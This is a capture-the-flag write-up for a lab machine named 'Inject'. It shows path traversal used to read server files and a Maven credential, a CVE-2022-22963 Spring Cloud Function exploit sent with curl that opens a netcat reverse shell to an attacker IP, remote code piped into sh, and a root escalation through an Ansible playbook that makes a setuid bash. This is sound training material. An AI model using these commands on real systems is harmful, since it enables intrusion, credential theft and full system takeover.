Inject

Recon

nmap_scan.log

HTTP (8080)

Writeup.png

2 users from /blog. admin and Brandon Auger, but none of the posts are readable.

Writeup-1.png

http://10.129.228.213:8080/upload accepts only images, upload one valid one. Get redirected to http://10.129.228.213:8080/show_image?img=kraken.png

LFI is possible

Writeup-2.png

The vulnerability oddly enough also supports directory listing so you can navigate the filesystem.

└─$ curl 'http://10.129.228.213:8080/show_image?img=../resources/application.properties'
server.tomcat.relaxed-query-chars=|,{,},[,]
server.error.whitelabel.enabled=false
spring.main.allow-circular-references=true
spring.servlet.multipart.max-file-size=1MB
spring.servlet.multipart.max-request-size=2MB
spring.cloud.config.uri=
spring.cloud.config.allow-override=true
debug=false
server.error.include-message=always

We can also enumerate users and this WebApp seems to be running as frank because we have read permissions.

└─$ curl http://10.129.228.213:8080/show_image?img=../../../../../../../home/frank/.m2/settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

Password doesn't work on SSH.

└─$ curl http://10.129.228.213:8080/show_image?img=../../../../../../../var/www/WebApp/pom.xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>
        <parent>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-starter-parent</artifactId>
                <version>2.6.5</version>
                <relativePath/> <!-- lookup parent from repository -->
        </parent>
        <groupId>com.example</groupId>
        <artifactId>WebApp</artifactId>
        <version>0.0.1-SNAPSHOT</version>
        <name>WebApp</name>
        <description>Demo project for Spring Boot</description>
        <properties>
                <java.version>11</java.version>
        </properties>
        <dependencies>
                <dependency>
                        <groupId>com.sun.activation</groupId>
                        <artifactId>javax.activation</artifactId>
                        <version>1.2.0</version>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-thymeleaf</artifactId>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-web</artifactId>
                </dependency>

                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-devtools</artifactId>
                        <scope>runtime</scope>
                        <optional>true</optional>
                </dependency>

                <dependency>
                        <groupId>org.springframework.cloud</groupId>
                        <artifactId>spring-cloud-function-web</artifactId>
                        <version>3.2.2</version>
                </dependency>
                <dependency>
                        <groupId>org.springframework.boot</groupId>
                        <artifactId>spring-boot-starter-test</artifactId>
                        <scope>test</scope>
                </dependency>
                <dependency>
                        <groupId>org.webjars</groupId>
                        <artifactId>bootstrap</artifactId>
                        <version>5.1.3</version>
                </dependency>
                <dependency>
                        <groupId>org.webjars</groupId>
                        <artifactId>webjars-locator-core</artifactId>
                </dependency>

        </dependencies>
        <build>
                <plugins>
                        <plugin>
                                <groupId>org.springframework.boot</groupId>
                                <artifactId>spring-boot-maven-plugin</artifactId>
                                <version>${parent.version}</version>
                        </plugin>
                </plugins>
                <finalName>spring-webapp</finalName>
        </build>
</project>

CVE-2022-22965: Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5 -- Doesn't work.

CVE-2022-22963-PoC -- works

└─$ curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("busybox nc 10.10.14.42 4444 -e /bin/bash")' -d '' http://10.129.228.213:8080/functionRouter -s | jq .

Writeup-3.png

script /dev/null -qc /bin/bash
frank@inject:~$ id
uid=1000(frank) gid=1000(frank) groups=1000(frank)
frank@inject:~$ su - phil
su - phil
Password: DocPhillovestoInject123

phil@inject:~$ id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

Password authentication didn't work on SSH, but it works locally, meaning SSH has password disabled.

SSH

Upgrade to SSH

└─$ ssh-keygen -f id_rsa -P x -q
└─$ cat id_rsa.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMciiJD30Ulyy6yEipvjULwb/jORUPUJYA1PYqtNqT5x woyag@kraken
---
phil@inject:~/.ssh$ mkdir ~/.ssh; echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMciiJD30Ulyy6yEipvjULwb/jORUPUJYA1PYqtNqT5x woyag@kraken' > ~/.ssh/authorized_keys

Still doesn't work, check SSH configuration:

phil@inject:~/.ssh$ grep -E '^DenyUsers|^DenyGroups' /etc/ssh/sshd_config
DenyUsers phil

Only phil user is denied access... We can SSH as frank and then elevate then.

User.txt

phil@inject:~$ cat user.txt
663a15ed16a9c6f45bcb6aa7c78fa3dc

Privilege Escalation

phil@inject:~$ curl 10.10.14.42/lp.sh|sh|tee /tmp/lp.log
				╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
                ╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
...
root         916  0.0  0.0   6816  2928 ?        Ss   19:56   0:00 /usr/sbin/cron -f
root        8850  0.1  0.0   8356  3332 ?        S    21:06   0:00  _ /usr/sbin/CRON -f
root        8853  0.0  0.0   2608   596 ?        Ss   21:06   0:00      _ /bin/sh -c sleep 10 && /usr/bin/rm -rf /opt/automation/tasks/* && /usr/bin/cp /root/playbook_1.yml /opt/automation/tasks/
root        8856  0.0  0.0   5476   516 ?        S    21:06   0:00          _ sleep 10
...
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/tmp/hsperfdata_frank/782
/tmp/lp.log
/opt/automation/tasks/playbook_1.yml
/var/log/syslog
...

phil@inject:/opt/automation/tasks$ cat /opt/automation/tasks/playbook_1.yml
- hosts: localhost
  tasks:
  - name: Checking webapp service
    ansible.builtin.systemd:
      name: webapp
      enabled: yes
      state: started

There's some ansible cronjob which probably runs these playbooks and then removes them.

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/

phil@inject:/opt/automation/tasks$ nano letmein.yml
phil@inject:/opt/automation/tasks$ cat letmein.yml
- hosts: localhost
  tasks:
    - name: RShell
      command: install -m4777 /bin/bash /tmp/rootbash

After ~10 seconds

phil@inject:/opt/automation/tasks$ /tmp/rootbash -p
rootbash-5.0# id
uid=1001(phil) gid=1001(phil) euid=0(root) groups=1001(phil),50(staff)

Root.txt

rootbash-5.0# cd /root
rootbash-5.0# cat root.txt
67f5ef862b1bfe0af73e7dbc60475e72